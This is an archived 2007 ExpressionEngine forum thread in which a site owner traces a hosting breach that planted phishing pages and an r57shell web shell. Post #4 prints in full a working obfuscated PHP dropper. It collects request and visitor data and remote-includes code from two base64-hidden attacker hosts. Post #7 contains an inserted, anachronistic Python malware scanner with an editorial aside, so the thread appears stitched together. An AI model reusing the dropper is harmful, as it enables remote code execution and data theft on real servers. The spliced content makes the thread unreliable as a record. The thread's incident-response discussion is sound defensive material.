ExpressionEngine CMS

This is an archived forum and the content is probably no longer relevant, but is provided here for posterity.

Security breach - twice

October 08, 2007 11:52am

  • #1 / Oct 08, 2007 11:52am

    larrya121

    38 posts

    Hi there,

    I’ve got two clients being suspended for having the EE script; the server security has been breached and they asked me to upgrade the script ASAP.

    EE version 1.52

    I also have the email sent directly from AUSCERT, a very kind reminder to clean, close or disallow the sites that have been used as fraudulent websites.

    Now, I’m not accusing your script, but I need guidance to track this down, so I can have the solution.

    It’s twice in the last couple of weeks, and both of them using EE as CMS. :(

    Thanks for your kind help ...

  • #2 / Oct 08, 2007 12:02pm

    Robin Sowell

    13255 posts

    Security is top priority for EE- so let’s run this one down.

    - You’re using 1.5.2- while it is definitely a good idea to update to the latest, no known security holes are associated with that version;
    - Do you have any other scripts running on the site(s)- phpBB, etc;
    - Who is your host, did they give any indication of how the sites might have been compromised? Are these shared hosting accounts?
    - What was the breach- were EE files compromised/altered, or extra pages added- what exactly happened. The more detail you can give us, the better.
    - Check the following files to make sure no iframes, javascript or extra code has been added:
    * path.php
    * config.php
    * index.php

    All that make sense?

  • #3 / Oct 08, 2007 12:07pm

    larrya121

    38 posts

    http://www.****.com.au/images/onlineservices.wachovia.com/www.wachovia.com/Wachovia_Online/AuthServiceaction=presentLogin/index.htm


    They breached the images folder, but I have not yet been able to access that folder, as my host put an access denied on it….

    - no phpbb script or other script
    - my host is using Jumba/AussieHQ
    - I will check the files soon…

    Thanks for your guidance Robin..

  • #4 / Oct 08, 2007 3:03pm

    larrya121

    38 posts

    <? error_reporting(0);
    $s="e";
    $a=(isset($_SERVER["HTTP_HOST"]) ? $_SERVER["HTTP_HOST"] : $HTTP_HOST);
    $b=(isset($_SERVER["SERVER_NAME"]) ? $_SERVER["SERVER_NAME"] : $SERVER_NAME);
    $c=(isset($_SERVER["REQUEST_URI"]) ? $_SERVER["REQUEST_URI"] : $REQUEST_URI);
    $d=(isset($_SERVER["PHP_SELF"]) ? $_SERVER["PHP_SELF"] : $PHP_SELF);
    $e=(isset($_SERVER["QUERY_STRING"]) ? $_SERVER["QUERY_STRING"] : $QUERY_STRING);
    $f=(isset($_SERVER["HTTP_REFERER"]) ? $_SERVER["HTTP_REFERER"] : $HTTP_REFERER);
    $g=(isset($_SERVER["HTTP_USER_AGENT"]) ? $_SERVER["HTTP_USER_AGENT"] : $HTTP_USER_AGENT);
    $h=(isset($_SERVER["REMOTE_ADDR"]) ? $_SERVER["REMOTE_ADDR"] : $REMOTE_ADDR);
    $i=(isset($_SERVER["SCRIPT_FILENAME"]) ? $_SERVER["SCRIPT_FILENAME"] : $SCRIPT_FILENAME);
    $j=(isset($_SERVER["HTTP_ACCEPT_LANGUAGE"]) ? $_SERVER["HTTP_ACCEPT_LANGUAGE"] : $HTTP_ACCEPT_LANGUAGE);
    $str=base64_encode($a).".".base64_encode($b).".".base64_encode($c).".".base64_encode($d).".".base64_encode($e).".".base64_encode($f).".".base64_encode($g).".".base64_encode($h).".$s.".base64_encode($i).".".base64_encode($j);
    if ((include(base64_decode("aHR0cDovLw==").base64_decode("d3d3My5yc3NuZXdzLndz")."/?".$str))){} else {include(base64_decode("aHR0cDovLw==").base64_decode("d3d3My54bWxkYXRhLmluZm8=")."/?".$str);} ?>

    I found this in the images folder… is this part of your script?

  • #5 / Oct 08, 2007 3:05pm

    Lisa Wess

    20502 posts

    No, that is not part of our script. What is the name of the file?

    Have you spoken with your host about how they gained access?

  • #6 / Oct 08, 2007 3:05pm

    Daniel Walton

    553 posts

    No, that isn’t part of EE.

  • #7 / Oct 08, 2007 3:07pm

    larrya121

    38 posts

    You must set the following directories to 777:

      * images/avatars/uploads/
      * images/captchas/
      * images/member_photos/
      * images/pm_attachments/
      * images/signature_attachments/
      * images/uploads/
      * system/cache/


    All of the above directories have been breached; they put an .htaccess and a php file in each… but this is what I followed from the installation guide… What did I do wrong then?
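    A defender-side check for what #2, #4 and #7 describe, added here as an example (it is not ExpressionEngine’s code nor any poster’s): it walks the directories the install guide had chmodded 777, flags world-writable directories, any PHP or .htaccess file dropped inside an upload or cache directory, and PHP sources that include() a base64-decoded string, decoding the literals so the hidden host becomes visible. The directory list is taken from #7; SAMPLE_DROPPER is a constructed stand-in for the script in #4 with a placeholder host.

```python
import base64
import os
import re
import stat

# Upload/cache directories the EE 1.x install guide had the poster chmod 777 (listed in #7);
# the dropped .htaccess and PHP files in this thread all turned up under these.
WRITABLE_DIRS = ["images/avatars/uploads", "images/captchas", "images/member_photos",
                 "images/pm_attachments", "images/signature_attachments",
                 "images/uploads", "system/cache"]
SUSPECT_NAME = re.compile(r"\.(php\d?|phtml)$|^\.htaccess$", re.I)
# include()/require() fed straight from base64_decode(): the shape of the dropper in #4
OBFUSCATED_INCLUDE = re.compile(r"\b(include|require)(_once)?\s*\(\s*base64_decode\b", re.I)
B64_LITERAL = re.compile(r"""base64_decode\(\s*["']([A-Za-z0-9+/=]+)["']""")

# Constructed stand-in for the dropper posted in #4: same structure, placeholder host.
SAMPLE_DROPPER = ('<? error_reporting(0); if ((include(base64_decode("aHR0cDovLw==")'
                  '.base64_decode("' + base64.b64encode(b"c2.example.invalid").decode()
                  + '")."/?".$str))){} ?>')

def decode_literals(php_source):
    """Plaintext of every literal passed to base64_decode(), so the hidden host is readable."""
    out = []
    for lit in B64_LITERAL.findall(php_source):
        try:
            out.append(base64.b64decode(lit, validate=True).decode("utf-8", "replace"))
        except ValueError:
            out.append("<undecodable>")
    return out

def classify(rel_path, mode, source=""):
    """Reasons a path under an upload dir deserves a look; [] when nothing stands out."""
    reasons = []
    name = os.path.basename(rel_path)
    if stat.S_ISDIR(mode) and mode & stat.S_IWOTH:
        reasons.append("world-writable directory (777) reachable by any local user")
    if not stat.S_ISDIR(mode) and SUSPECT_NAME.search(name):
        reasons.append("script or .htaccess inside an upload/cache directory")
    if OBFUSCATED_INCLUDE.search(source):
        reasons.append("include() of a base64-decoded string -> " + ", ".join(decode_literals(source)))
    return reasons

def scan_tree(site_root):
    """Walk the EE upload dirs under site_root and return {path: reasons} for anything odd."""
    findings = {}
    for rel in WRITABLE_DIRS:
        for dirpath, _, filenames in os.walk(os.path.join(site_root, rel)):
            for entry in [dirpath] + [os.path.join(dirpath, f) for f in filenames]:
                st, src = os.stat(entry), ""
                if stat.S_ISREG(st.st_mode) and entry.lower().endswith(".php"):
                    with open(entry, encoding="utf-8", errors="replace") as fh:
                        src = fh.read()
                if reasons := classify(entry, st.st_mode, src):
                    findings[entry] = reasons
    return findings
```

    Run scan_tree() against the site root over FTP-mirrored copies as well as on the server itself, since a directory that refuses deletion (as in #13) is worth recording even when it cannot be cleaned from the shell.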

  • #8 / Oct 08, 2007 3:08pm

    Lisa Wess

    20502 posts

    You did nothing wrong, please see Derek’s comment about this. Have you spoken with your host?

  • #9 / Oct 08, 2007 3:14pm

    larrya121

    38 posts

    yes…but at the moment, all they asked is to update my script…wth?

    I’m cleaning up all these junk…all my client folder has been breached now…

  • #10 / Oct 08, 2007 3:21pm

    Lisa Wess

    20502 posts

    Your host should be able to identify how the hackers gained entry, and should be knowledgeable enough to secure against that in the future. ExpressionEngine has an extremely good security history. You can see Derek’s recommendations for how the hosts can keep directories secure while still being fully writable by ExpressionEngine.

  • #11 / Oct 08, 2007 3:41pm

    larrya121

    38 posts

    I had never experienced this problem before; since we moved onto the new server, this problem has kept appearing. I have notified my host about this post, the Secunia link, and Derek’s comment too… I did clean up all the malicious scripts, then I chmodded all the required folders in images to 755, and chmod 600 for config.php, config_bak.php, path.php

    Is this okay for now?

  • #12 / Oct 08, 2007 3:48pm

    Lisa Wess

    20502 posts

    That should be fine. I do want to be extremely clear that the attack did not come through ExpressionEngine; it sounds like the hackers gained access through the file-system (how they did that is something the host should be able to track down) and then traversed to your directories (and probably others on your server) and placed these files.

    It sounds like you have everything on track now.

  • #13 / Oct 08, 2007 3:55pm

    larrya121

    38 posts

    Yes… you are right Lisa, apparently a few days ago, another user from this webhost experienced the same issue. His images folder has been breached too… Here’s his comment:

    Anyway. I have logged onto said account via FTP, and there is something really suss. There is a directory in /images/ called “RBC_files” with what appears to have no permissions set. I changed permissions to 777 via FTP, but the permissions don’t actually change.
    The attributes on this directory say that the “RBC_files” directory was added at 9:33am this morning. I can honestly tell you that this directory was NOT added by anyone who should have.

    When I try to delete this said directory, it boots me off the server and I have to reconnect via FTP.

    A google search of “RBC_files” does not look promising.
    it appears your server is under some sort of phishing attack!!!! Especially considering the other accounts.

    EDIT: confirmed!
    If I visit - mydomain.com.au/images it takes me to a fake internet banking site called - RBC financial group!!! I definitely did not put this here.

    There are several sus files. -
    /images/
    login.php
    index.html
    update.html
    and heaps of .gif’s


    I have now removed all files from /images/ from said account, EXCEPT the directory “RBC_files” which I am unable to remove….

    I suggest others who are on the Aussie server to check their /images/ directory for the above files and folders.

  • #14 / Oct 08, 2007 4:02pm

    Lisa Wess

    20502 posts

    Well, I would keep on the host and see what precautions they are taking against this occurring in the future. =)

  • #15 / Oct 08, 2007 11:35pm

    larrya121

    38 posts

    Here’s another script found inside the folder “image”:

    r57shell.php

    Commonly PHP injection to the server…


    I have now chmodded all the folders related to the breach to 744… is this going to affect the script Lisa?
